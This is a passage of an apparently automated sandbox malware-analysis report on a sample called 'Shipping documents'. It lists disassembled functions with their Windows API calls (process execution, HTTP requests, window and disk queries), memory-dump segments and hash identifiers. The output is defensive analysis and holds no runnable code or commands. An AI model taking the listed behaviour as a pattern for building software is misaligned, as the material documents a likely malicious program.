                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \$]$h
                                                                                                          • API String ID: 4104443479-3262404753
                                                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                          Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                          • String ID: <$@
                                                                                                          • API String ID: 2417854910-1426351568
                                                                                                          • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                          • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                          Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3705125965-3916222277
                                                                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                          Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 135850232-4108050209
                                                                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                          Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                          Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                          Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 3375834691-2298589950
                                                                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                          Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: $<
                                                                                                          • API String ID: 4104443479-428540627
                                                                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                          Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                          Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                          Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                          Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2507767853-234962358
                                                                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                          Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2507767853-234962358
                                                                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                          Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: msctls_trackbar32
                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                          Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
